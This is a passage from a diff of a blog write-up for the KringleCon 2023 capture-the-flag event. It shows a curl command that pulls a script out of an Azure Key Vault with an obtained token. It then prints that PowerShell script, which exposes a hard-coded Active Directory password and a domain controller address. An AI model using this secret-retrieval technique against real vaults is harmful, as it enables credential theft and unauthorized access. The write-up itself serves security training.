lavafroth/lavafroth.github.io/content/post/kringlecon-2023-writeup.md

 }
 ```

+This returns a JSON object with a lot of unnecessary attributes, so to fetch the
+value of the script in its raw form we can repeat the request with jq with the
+`-r` flag and the `value` argument.

 ```sh
 curl --header "$HEADER" "https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript?maxresults=1&api-version=7.4" | jq -r .value
 ```

+Inside the retrieved PowerShell script, we find that the password to the Active Directory box is hard-coded.

 ```powershell
 Import-Module ActiveDirectory; $UserName = "elfy"; $UserDomain = "northpole.local"; $UserUPN = "$UserName@$UserDomain"; $Password = ConvertTo-SecureString "J4`ufC49/J4766" -AsPlainText -Force; $DCIP = "10.0.0.53"; New-ADUser -UserPrincipalName $UserUPN -Name $UserName -GivenName $UserName -Surname "" -Enabled $true -AccountPassword $Password -Server $DCIP -PassThru